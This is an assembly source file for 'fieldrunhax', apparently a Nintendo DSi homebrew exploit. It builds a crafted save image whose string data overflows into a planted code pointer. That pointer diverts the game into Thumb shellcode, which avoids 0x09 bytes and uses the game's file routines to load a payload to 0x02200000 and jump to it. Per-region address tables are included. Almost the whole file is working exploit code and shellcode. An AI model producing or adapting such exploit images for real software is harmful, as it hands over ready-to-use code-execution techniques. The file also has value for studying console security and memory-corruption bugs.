dsi/exploits/fieldrunhax/fieldrunhax.s

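/*
 * fieldrunhax.s -- region-specific exploit image for fieldrunhax.
 *
 * This file is run through the C preprocessor: REGCODE (defined by the
 * build, not in this file) selects one of the per-region address tables
 * below.  The output is a flat image (section .init, entry _start) whose
 * byte layout is pinned by the .space directives at the bottom: Thumb
 * shellcode directly after xmlhdr.bin, a code pointer at image offset
 * 0x488, the generic TWL payload at offset 0x1030, total size 0xe7c4.
 * Any change to the shellcode must keep it inside the window before
 * offset 0x488 (otherwise the .space there goes negative and the assembler
 * rejects it) and free of 0x09 bytes (see the note at the first
 * "mov r0, sp").
 */
.arch armv5te
.fpu softvfp
.eabi_attribute 23, 1
.eabi_attribute 24, 1
.eabi_attribute 25, 1
.eabi_attribute 26, 1
.eabi_attribute 30, 2
.eabi_attribute 18, 4
.global _start
.section .init
#define REGION_USA 45
#define REGION_EUR 56
#define REG_BASE 0x04000000             /* not referenced in this file */
#define savpath 0x0207d6a0              /* passed as r1 to dFS_Open; presumably a path string -- confirm */
#if REGCODE==REGION_USA
#define JUMPADR 0x02076bb4//This jumps to some code with the func ptr at *(r0+8). This is a string buffer with the strncpy'd data from stack, in the format of: "1. "<string data> Thus it executes ascii "1. ", then the shellcode, though it executes that ascii w/o crashing.
#define dFS_InitCtx 0x2059878
#define dFS_Open 0x02059a2c
#define dFS_Close 0x02059ab0
#define dFS_Read 0x02059bd4
#define dFS_Seek 0x02059ba8
#elif REGCODE==REGION_EUR
#define JUMPADR 0x2076bbc
#define dFS_InitCtx 0x2059880
#define dFS_Open 0x2059a34
#define dFS_Close 0x2059ab8
#define dFS_Read 0x2059bdc
#define dFS_Seek 0x2059bb0
#else
/* Fail early and clearly: without a region table JUMPADR and the dFS_*
 * symbols stay undefined and the failure only surfaces at link time. */
#error "REGCODE must be REGION_USA or REGION_EUR"
#endif

_start:
.incbin "xmlhdr.bin"

shellcode:
@ Entered in ARM state; the two ARM instructions below switch to Thumb.
@ Register roles in the Thumb part:
@   sp = buffer passed as the first argument (r0) to every dFS_* call
@   r4 = call target
@   r7 = 0x02200000, the final jump target, kept live across all calls
.arm
        add     r1, pc, #1              @ pc reads as this insn + 8 = first Thumb insn; +1 sets the Thumb bit
        bx      r1
.thumb
        mov     r0, sp @ This game replaces "/t" 0x09 bytes with ' ' 0x20. Thus we must avoid using instructions with that data.
        ldr     r4, =dFS_InitCtx
        blx     r4
        mov     r0, sp
        ldr     r1, =savpath
        mov     r2, #1                  @ presumably an open mode -- confirm against dFS_Open
        ldr     r4, =dFS_Open
        blx     r4
        mov     r0, sp
        @ Thumb-1 mov/add immediates are 8-bit, so the wider constants below
        @ are assembled from pieces.
        mov     r4, #0x10
        lsl     r4, #8
        add     r4, #0x30               @ r4 = 0x1030: image offset of the payload (see .space below)
        mov     r3, #0x0020
        lsl     r3, #4
        add     r3, #0x20
        lsl     r3, #16                 @ r3 = 0x02200000
        mov     r7, r3                  @ r7 = 0x02200000, consumed by the final bx
        sub     r3, r4                  @ r3 = 0x02200000 - 0x1030 = 0x021fefd0
        mov     r1, r3                  @ r1 = destination: image offset 0x1030 lands at 0x02200000
        mov     r2, #0xd4
        lsl     r2, #8
        add     r2, #4                  @ r2 = 0xd404
        add     r2, r4                  @ r2 = 0xe434 bytes: the image up to offset 0x1030 + 0xd404
        @ldr r4, =dFS_Read
        ldr     r4, =dFS_Seek
        add     r4, #0x2c               @ dFS_Seek + 0x2c == dFS_Read in both region tables above;
                                        @ presumably done this way to keep 0x09 out of the encoding -- confirm
        blx     r4                      @ presumably dFS_Read(ctx, dst, len) -- confirm argument order
        mov     r0, sp
        @ldr r4, =dFS_Close
        ldr     r4, =dFS_Open
        add     r4, #0x84               @ dFS_Open + 0x84 == dFS_Close in both region tables above
        blx     r4
        mov     r1, r7
        bx      r1                      @ r1 = 0x02200000, bit 0 clear: enter the payload in ARM state
fail_lp:
        b       fail_lp                 @ not expected to be reached; spin instead of running into the pool
.byte 0x55, 0x55 @ padding
.pool
.space (_start + 0x488) - .             @ pad to image offset 0x488
.word JUMPADR                           @ the pointer described in the JUMPADR note above
.incbin "xmlfooter.bin"
.space (_start + 0x1030) - .            @ pad to image offset 0x1030
.incbin "../generictwlpayload/generictwlpayload.bin"
.space (_start + 0xe7c4) - .            @ pad the image to its fixed total size 0xe7c4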